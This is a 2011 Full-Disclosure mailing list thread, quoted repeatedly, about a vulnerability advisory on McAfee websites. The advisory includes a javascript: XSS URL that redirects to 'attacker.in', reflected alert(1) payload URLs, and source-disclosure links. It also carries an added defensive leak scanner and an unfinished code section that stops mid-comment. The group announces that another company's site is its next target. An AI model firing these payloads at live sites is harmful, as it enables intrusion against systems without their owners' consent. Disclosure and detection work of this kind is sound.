>> >>> http://ximen.es/
>> >>> http://twitter.com/pabloximenes
>> >>>
>> >>>
>> >>>
>> >>> 2011/3/27 YGN Ethical Hacker Group 
>> 
>>  Vulnerabilities in *McAfee.com
>> 
>> 
>>  1. VULNERABILITY DESCRIPTION
>> 
>>  -> Cross Site Scripting
>> 
>> 
>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
>> 
>>  -> Information Disclosure > Internal Hostname:
>> http://www.mcafee.com/js/omniture/omniture_profile.js
>> 
>> ($ ruby host-extract.rb -a
>>  http://www.mcafee.com/js/omniture/omniture_profile.js)
>> 
>>  -> Information Disclosure > Source Code Disclosure:
>> 
>> 
>>   view-source:
>> http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>> 
>>   view-source:
>> http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>> 
>>   view-source:
>> http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>> view-source:
>> http://download.mcafee.com/clinic/Includes/common.asp
>> 
>>   view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>> 
>>   view-source:
>> http://download.mcafee.com/updates/common/dat_common.asp
>> view-source:http://download.mcafee.com/updates/updates.asp
>> view-source:http://download.mcafee.com/updates/superDat.asp
>> view-source:http://download.mcafee.com/eval/evaluate2.asp
>> 
>>   view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>> 
>>   view-source:
>> http://download.mcafee.com/common/ssi/errHandler_soft.asp
>> view-source:
>> http://download.mcafee.com/common/ssi/variables.asp
>> 
>>   view-source:
>> http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>> view-source:
>> http://download.mcafee.com/common/ssi/errHandler.asp
>> view-source:
>> http://download.mcafee.com/common/ssi/common_subs.asp
>> 
>>   view-source:
>> http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
>> view-source:http://download.mcafee.com/us/bannerAd.asp
>> 
>>   view-source:
>> http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
>> 
>> 
>>  2. RECOMMENDATION
>> 
>>  - Fully utilize McAfee Foundstone Experts
>>  - Use outbound monitoring of traffic to detect potential information
>>  leakage
>> 
>> 
>>  3. VENDOR
>> 
>>  McAfee Inc
>>  http://www.mcafee.com
>> 
>> 
>>  4. DISCLOSURE TIME-LINE
>> 
>>  2011-02-10: reported to vendor
>>  2011-02-12: vendor replied "we are working to resolve the issue as
>>  quickly as possible"
>>  2011-03-27: vulnerability found to be unfixed completely
>>  2011-03-27: vulnerability disclosed
>> 
>> 
>>  5. REFERENCES

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Benji
I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
ethical hacking group YGN!!!111


(Plzdontxssme)

On 3/30/11, YGN Ethical Hacker Group  wrote:
> According to xssed.com,  there are two remaining XSS issues:
>
> https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
> https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>
>
> You guys know our disclosed issues are very simple and can easily be
> found through viewing HTML/JS source codes and simple Google Hacking
> (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
>
> However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
> http://www.cenzic.com/company/management/khera/,  according to Network
> World News editor - Ellen Messmer.  Thus, the next target is Cenzic
> web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
> is.
>
>
> -
> Best regards,
> YGN Ethical Hacker Group
> Yangon, Myanmar (Burma)
> http://yehg.net
> Our Lab | http://yehg.net/lab
> Our Directory | http://yehg.net/hwd
>
>
>
>
> On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
>> FYI
>>
>> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
>>
>>
>> Pablo Ximenes
>> http://ximen.es/
>> http://twitter.com/pabloximenes
>>
>>
>>
>>
>> 2011/3/28 Pablo Ximenes :
>>> blog post about this: http://ximen.es/?p=469
>>>
>>> Please, don't throw stones at me.
>>>
>>> []'s
>>>
>>>
>>> Pablo Ximenes
>>> http://ximen.es/
>>> http://twitter.com/pabloximenes
>>>
>>>
>>>
>>> 2011/3/27 YGN Ethical Hacker Group 

 Vulnerabilities in *McAfee.com


 1. VULNERABILITY DESCRIPTION

 -> Cross Site Scripting

 http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')

 -> Information Disclosure > Internal Hostname:
    http://www.mcafee.com/js/omniture/omniture_profile.js

    ($ ruby host-extract.rb -a
 http://www.mcafee.com/js/omniture/omniture_profile.js)

 -> Information Disclosure > Source Code Disclosure:


  view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp

  view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp

  view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
        view-source:http://download.mcafee.com/clinic/Includes/common.asp

  view-source:http://download.mcafee.com/updates/upgrade_patches.asp

  view-source:http://download.mcafee.com/updates/common/dat_common.asp
        view-source:http://download.mcafee.com/updates/updates.asp
        view-source:http://download.mcafee.com/updates/superDat.asp
        view-source:http://download.mcafee.com/eval/evaluate2.asp

  view-source:http://download.mcafee.com/common/ssi/conditionals.asp

  view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
        view-source:http://download.mcafee.com/common/ssi/variables.asp

  view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
        view-source:http://download.mcafee.com/common/ssi/errHandler.asp
        view-source:http://download.mcafee.com/common/ssi/common_subs.asp

  view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
        view-source:http://download.mcafee.com/us/bannerAd.asp

  view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp


 2. RECOMMENDATION

 - Fully utilize McAfee Foundstone Experts
 - Use outbound monitoring of traffic to detect potential information
 leakage


 3. VENDOR

 McAfee Inc
 http://www.mcafee.com


 4. DISCLOSURE TIME-LINE

 2011-02-10: reported to vendor
 2011-02-12: vendor replied "we are working to resolve the issue as
 quickly as possible"
 2011-03-27: vulnerability found to be unfixed completely
 2011-03-27: vulnerability disclosed


 5. REFERENCES

 Original Advisory URL:

 http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
 Former Disclosure, 2008:
 http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
 Former Disclosure, 2009:

 http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
 Former Disclosure, 2010:

 http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
 host-extract: http://code.google.com/p/host-extract/
 Demo:
 http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
 xssed: http://www.xssed.com/search?key=mcafee.com
 Lessons Learned:
 http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach

 #yehg [2011-03-27]

 ___

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread YGN Ethical Hacker Group
According to xssed.com,  there are two remaining XSS issues:

https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //


You guys know our disclosed issues are very simple and can easily be
found through viewing HTML/JS source codes and simple Google Hacking
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/,  according to Network
World News editor - Ellen Messmer.  Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is.


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd




On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
> FYI
>
> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
>
>
> Pablo Ximenes
> http://ximen.es/
> http://twitter.com/pabloximenes
>
>
>
>
> 2011/3/28 Pablo Ximenes :
>> blog post about this: http://ximen.es/?p=469
>>
>> Please, don't throw stones at me.
>>
>> []'s
>>
>>
>> Pablo Ximenes
>> http://ximen.es/
>> http://twitter.com/pabloximenes
>>
>>
>>
>> 2011/3/27 YGN Ethical Hacker Group 
>>>
>>> Vulnerabilities in *McAfee.com
>>>
>>>
>>> 1. VULNERABILITY DESCRIPTION
>>>
>>> -> Cross Site Scripting
>>>
>>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
>>>
>>> -> Information Disclosure > Internal Hostname:
>>>    http://www.mcafee.com/js/omniture/omniture_profile.js
>>>
>>>    ($ ruby host-extract.rb -a
>>> http://www.mcafee.com/js/omniture/omniture_profile.js)
>>>
>>> -> Information Disclosure > Source Code Disclosure:
>>>
>>>
>>>  view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>>>
>>>  view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>>>
>>>  view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>>>        view-source:http://download.mcafee.com/clinic/Includes/common.asp
>>>        view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>>>
>>>  view-source:http://download.mcafee.com/updates/common/dat_common.asp
>>>        view-source:http://download.mcafee.com/updates/updates.asp
>>>        view-source:http://download.mcafee.com/updates/superDat.asp
>>>        view-source:http://download.mcafee.com/eval/evaluate2.asp
>>>        view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>>>
>>>  view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
>>>        view-source:http://download.mcafee.com/common/ssi/variables.asp
>>>
>>>  view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>>>        view-source:http://download.mcafee.com/common/ssi/errHandler.asp
>>>        view-source:http://download.mcafee.com/common/ssi/common_subs.asp
>>>
>>>  view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
>>>        view-source:http://download.mcafee.com/us/bannerAd.asp
>>>
>>>  view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
>>>
>>>
>>> 2. RECOMMENDATION
>>>
>>> - Fully utilize McAfee Foundstone Experts
>>> - Use outbound monitoring of traffic to detect potential information
>>> leakage
>>>
>>>
>>> 3. VENDOR
>>>
>>> McAfee Inc
>>> http://www.mcafee.com
>>>
>>>
>>> 4. DISCLOSURE TIME-LINE
>>>
>>> 2011-02-10: reported to vendor
>>> 2011-02-12: vendor replied "we are working to resolve the issue as
>>> quickly as possible"
>>> 2011-03-27: vulnerability found to be unfixed completely
>>> 2011-03-27: vulnerability disclosed
>>>
>>>
>>> 5. REFERENCES
>>>
>>> Original Advisory URL:
>>>
>>> http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
>>> Former Disclosure, 2008:
>>> http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
>>> Former Disclosure, 2009:
>>>
>>> http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
>>> Former Disclosure, 2010:
>>>
>>> http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
>>> host-extract: http://code.google.com/p/host-extract/
>>> Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
>>> xssed: http://www.xssed.com/search?key=mcafee.com
>>> Lessons Learned:
>>> http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
>>>
>>> #yehg [2011-03-27]
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>

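Added example, not code from YGN, McAfee or the host-extract project: a small Node.js check in the spirit of the advisory's "outbound monitoring of traffic" recommendation and of the `"<% Dim" site:` search mentioned above. It flags two of the leak classes the advisory names in a response body: unrendered ASP source (server-side delimiters plus VBScript keywords, which is the pattern that search looks for) and internal-looking hostnames or RFC 1918 addresses inside served JavaScript. The sample responses, URLs and hostnames are constructed for illustration and are not McAfee content.

```javascript
// Added example, not YGN's, McAfee's or host-extract's code.
// Scans response bodies for two of the leak classes named in the advisory.

// Unrendered ASP delimiters: a rendered page should never contain these.
const ASP_BLOCK = /<%[\s\S]*?%>/g;
// VBScript/ASP keywords inside the block raise confidence that it is real
// server-side code rather than a literal "<%" in prose or a tutorial.
const ASP_HINTS = /\b(?:Dim|Set|Response\.Write|Request\.(?:Cookies|QueryString|Form|ServerVariables)|Server\.CreateObject)\b/;
// Hostnames under suffixes that are normally internal-only (heuristic; tune per estate).
const INTERNAL_HOST = /\b(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:local|internal|corp|lan|intranet|localdomain)\b/gi;
// RFC 1918 IPv4 literals (will also match version-like strings; review hits by hand).
const RFC1918 = /\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3})\b/g;

function findAspSource(body) {
  const hits = [];
  for (const m of body.matchAll(ASP_BLOCK)) {
    hits.push({
      offset: m.index,
      confident: ASP_HINTS.test(m[0]),
      preview: m[0].slice(0, 60).replace(/\s+/g, ' '),
    });
  }
  return hits;
}

function findInternalHosts(body) {
  const hits = new Set();
  for (const m of body.matchAll(INTERNAL_HOST)) hits.add(m[0].toLowerCase());
  for (const m of body.matchAll(RFC1918)) hits.add(m[0]);
  return [...hits].sort();
}

// One finding record per leak class present in a single response.
function scanResponse(url, body) {
  const findings = [];
  const asp = findAspSource(body).filter((h) => h.confident);
  if (asp.length > 0) {
    findings.push({ url, issue: 'server-side source disclosure', count: asp.length, preview: asp[0].preview });
  }
  const hosts = findInternalHosts(body);
  if (hosts.length > 0) {
    findings.push({ url, issue: 'internal hostname disclosure', hosts });
  }
  return findings;
}

// Constructed sample responses (not real McAfee content): one leaking ASP
// source, one analytics script leaking an internal host, one clean page.
const SAMPLES = [
  {
    url: 'https://downloads.example.com/includes/partner.asp',
    body: '<% Dim strPartner\r\n   strPartner = Request.QueryString("p") %>\r\n<html><body>Partner page</body></html>',
  },
  {
    url: 'https://www.example.com/js/analytics_profile.js',
    body: 'var s_account = "prodmetrics";\n' +
          's.trackingServer = "stats.example.com";\n' +
          'var devOrigin = "http://webdev01.corp.example.internal/";\n' +
          'var fallback = ["10.20.30.40"];\n',
  },
  {
    url: 'https://www.example.com/index.html',
    body: '<html><body><p>Download center</p><script src="/js/app.js"></script></body></html>',
  },
];

function runSamples() {
  return SAMPLES.flatMap((s) => scanResponse(s.url, s.body));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(runSamples(), null, 2));
}
```

Run with `node leakscan.js`; in a proxy or egress tap the same `scanResponse` would be applied to each outbound body. The VBScript-keyword filter is what keeps a documentation page that merely shows `<% ... %>` from raising an alert, and the hostname suffix list is deliberately a heuristic that each operator should replace with their own internal zones.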

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-29 Thread Pablo Ximenes
FYI

http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes


Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes




2011/3/28 Pablo Ximenes :
> blog post about this: http://ximen.es/?p=469
>
> Please, don't throw stones at me.
>
> []'s
>
>
> Pablo Ximenes
> http://ximen.es/
> http://twitter.com/pabloximenes
>
>
>
> 2011/3/27 YGN Ethical Hacker Group 
>>
>> Vulnerabilities in *McAfee.com
>>
>>
>> 1. VULNERABILITY DESCRIPTION
>>
>> -> Cross Site Scripting
>>
>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
>>
>> -> Information Disclosure > Internal Hostname:
>>    http://www.mcafee.com/js/omniture/omniture_profile.js
>>
>>    ($ ruby host-extract.rb -a
>> http://www.mcafee.com/js/omniture/omniture_profile.js)
>>
>> -> Information Disclosure > Source Code Disclosure:
>>
>>
>>  view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>>
>>  view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>>
>>  view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>>        view-source:http://download.mcafee.com/clinic/Includes/common.asp
>>        view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>>
>>  view-source:http://download.mcafee.com/updates/common/dat_common.asp
>>        view-source:http://download.mcafee.com/updates/updates.asp
>>        view-source:http://download.mcafee.com/updates/superDat.asp
>>        view-source:http://download.mcafee.com/eval/evaluate2.asp
>>        view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>>
>>  view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
>>        view-source:http://download.mcafee.com/common/ssi/variables.asp
>>
>>  view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>>        view-source:http://download.mcafee.com/common/ssi/errHandler.asp
>>        view-source:http://download.mcafee.com/common/ssi/common_subs.asp
>>
>>  view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
>>        view-source:http://download.mcafee.com/us/bannerAd.asp
>>
>>  view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
>>
>>
>> 2. RECOMMENDATION
>>
>> - Fully utilize McAfee Foundstone Experts
>> - Use outbound monitoring of traffic to detect potential information
>> leakage
>>
>>
>> 3. VENDOR
>>
>> McAfee Inc
>> http://www.mcafee.com
>>
>>
>> 4. DISCLOSURE TIME-LINE
>>
>> 2011-02-10: reported to vendor
>> 2011-02-12: vendor replied "we are working to resolve the issue as
>> quickly as possible"
>> 2011-03-27: vulnerability found to be unfixed completely
>> 2011-03-27: vulnerability disclosed
>>
>>
>> 5. REFERENCES
>>
>> Original Advisory URL:
>>
>> http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
>> Former Disclosure, 2008:
>> http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
>> Former Disclosure, 2009:
>>
>> http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
>> Former Disclosure, 2010:
>>
>> http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
>> host-extract: http://code.google.com/p/host-extract/
>> Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
>> xssed: http://www.xssed.com/search?key=mcafee.com
>> Lessons Learned:
>> http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
>>
>> #yehg [2011-03-27]
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-28 Thread Pablo Ximenes
blog post about this: http://ximen.es/?p=469

Please, don't throw stones at me.

[]'s


Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes



2011/3/27 YGN Ethical Hacker Group 

> Vulnerabilities in *McAfee.com
>
>
> 1. VULNERABILITY DESCRIPTION
>
> -> Cross Site Scripting
>
> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
>
> -> Information Disclosure > Internal Hostname:
>http://www.mcafee.com/js/omniture/omniture_profile.js
>
>($ ruby host-extract.rb -a
> http://www.mcafee.com/js/omniture/omniture_profile.js)
>
> -> Information Disclosure > Source Code Disclosure:
>
>view-source:
> http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>view-source:
> http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>view-source:
> http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>view-source:http://download.mcafee.com/clinic/Includes/common.asp
>view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>view-source:
> http://download.mcafee.com/updates/common/dat_common.asp
>view-source:http://download.mcafee.com/updates/updates.asp
>view-source:http://download.mcafee.com/updates/superDat.asp
>view-source:http://download.mcafee.com/eval/evaluate2.asp
>view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>view-source:
> http://download.mcafee.com/common/ssi/errHandler_soft.asp
>view-source:http://download.mcafee.com/common/ssi/variables.asp
>view-source:
> http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>view-source:http://download.mcafee.com/common/ssi/errHandler.asp
>view-source:http://download.mcafee.com/common/ssi/common_subs.asp
>view-source:
> http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
>view-source:http://download.mcafee.com/us/bannerAd.asp
>view-source:
> http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
>
>
> 2. RECOMMENDATION
>
> - Fully utilize McAfee Foundstone Experts
> - Use outbound monitoring of traffic to detect potential information
> leakage
>
>
> 3. VENDOR
>
> McAfee Inc
> http://www.mcafee.com
>
>
> 4. DISCLOSURE TIME-LINE
>
> 2011-02-10: reported to vendor
> 2011-02-12: vendor replied "we are working to resolve the issue as
> quickly as possible"
> 2011-03-27: vulnerability found to be unfixed completely
> 2011-03-27: vulnerability disclosed
>
>
> 5. REFERENCES
>
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
> Former Disclosure, 2008:
> http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
> Former Disclosure, 2009:
>
> http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
> Former Disclosure, 2010:
>
> http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
> host-extract: http://code.google.com/p/host-extract/
> Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
> xssed: http://www.xssed.com/search?key=mcafee.com
> Lessons Learned:
> http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
>
> #yehg [2011-03-27]
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-27 Thread Cal Leeming
GROUP HUG!

On Sun, Mar 27, 2011 at 9:02 PM,  wrote:

> > On Sun, Mar 27, 2011 at 7:45 PM,   wrote:
> >>> Vulnerabilities in *McAfee.com
> >>
> >> Am I right? Do they offer "Verified by McAfee" security services but are
> >> too lazy to fix their own shit? If so, LOL :D
> >
> > Maybe you should grow up you little twerp.
> >
> > Andrew
> >
> >
> >
> >
>
> Are you trying to make love with me? No thanks.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-27 Thread nix
> On Sun, Mar 27, 2011 at 7:45 PM,   wrote:
>>> Vulnerabilities in *McAfee.com
>>
>> Am I right? Do they offer "Verified by McAfee" security services but are
>> too lazy to fix their own shit? If so, LOL :D
>
> Maybe you should grow up you little twerp.
>
> Andrew
>
>
>
>

Are you trying to make love with me? No thanks.



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-27 Thread nix
> Vulnerabilities in *McAfee.com
>
>

Am I right? Do they offer "Verified by McAfee" security services but are
too lazy to fix their own shit? If so, LOL :D


> 1. VULNERABILITY DESCRIPTION
>
> -> Cross Site Scripting
>
> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
>
> -> Information Disclosure > Internal Hostname:
> http://www.mcafee.com/js/omniture/omniture_profile.js
>
> ($ ruby host-extract.rb -a
> http://www.mcafee.com/js/omniture/omniture_profile.js)
>
> -> Information Disclosure > Source Code Disclosure:
>
>   
> view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>   
> view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>   
> view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>   view-source:http://download.mcafee.com/clinic/Includes/common.asp
>   view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>   view-source:http://download.mcafee.com/updates/common/dat_common.asp
>   view-source:http://download.mcafee.com/updates/updates.asp
>   view-source:http://download.mcafee.com/updates/superDat.asp
>   view-source:http://download.mcafee.com/eval/evaluate2.asp
>   view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>   view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
>   view-source:http://download.mcafee.com/common/ssi/variables.asp
>   
> view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>   view-source:http://download.mcafee.com/common/ssi/errHandler.asp
>   view-source:http://download.mcafee.com/common/ssi/common_subs.asp
>   
> view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
>   view-source:http://download.mcafee.com/us/bannerAd.asp
>   
> view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
>
>
> 2. RECOMMENDATION
>
> - Fully utilize McAfee Foundstone Experts
> - Use outbound monitoring of traffic to detect potential information
> leakage
>
>
> 3. VENDOR
>
> McAfee Inc
> http://www.mcafee.com
>
>
> 4. DISCLOSURE TIME-LINE
>
> 2011-02-10: reported to vendor
> 2011-02-12: vendor replied "we are working to resolve the issue as
> quickly as possible"
> 2011-03-27: vulnerability found to be unfixed completely
> 2011-03-27: vulnerability disclosed
>
>
> 5. REFERENCES
>
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
> Former Disclosure, 2008:
> http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
> Former Disclosure, 2009:
> http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
> Former Disclosure, 2010:
> http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
> host-extract: http://code.google.com/p/host-extract/
> Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
> xssed: http://www.xssed.com/search?key=mcafee.com
> Lessons Learned:
> http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
>
> #yehg [2011-03-27]
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>




[Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-27 Thread YGN Ethical Hacker Group
Vulnerabilities in *McAfee.com


1. VULNERABILITY DESCRIPTION

-> Cross Site Scripting
   
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')

-> Information Disclosure > Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js   

($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)

-> Information Disclosure > Source Code Disclosure:


view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp

view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp

view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp 
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:http://download.mcafee.com/common/ssi/variables.asp

view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp

view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp

view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp


2. RECOMMENDATION

- Fully utilize McAfee Foundstone Experts
- Use outbound monitoring of traffic to detect potential information leakage


3. VENDOR

McAfee Inc
http://www.mcafee.com


4. DISCLOSURE TIME-LINE

2011-02-10: reported to vendor
2011-02-12: vendor replied "we are working to resolve the issue as
quickly as possible"
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessons Learned:
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach

#yehg [2011-03-27]

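The cross-site scripting entry in the advisory is a URL fragment (`#javascript:...`) that the help viewer presumably turns into a navigation target; the advisory does not show the viewer code, so the pattern below is an assumption, not McAfee's or YGN's code. As an added example, here is that unsafe pattern beside a hardened resolver for a help viewer that maps `location.hash` to a topic URL. The base URL and topic names are constructed. The hardened version hands the value to the WHATWG URL parser, which also normalises tricks such as embedded tabs or a percent-encoded scheme, and then accepts only same-origin http(s) targets inside the help tree.

```javascript
// Added example, not McAfee's or YGN's code. Assumes a help viewer that turns
// location.hash into the URL of the topic to load (a constructed scenario).

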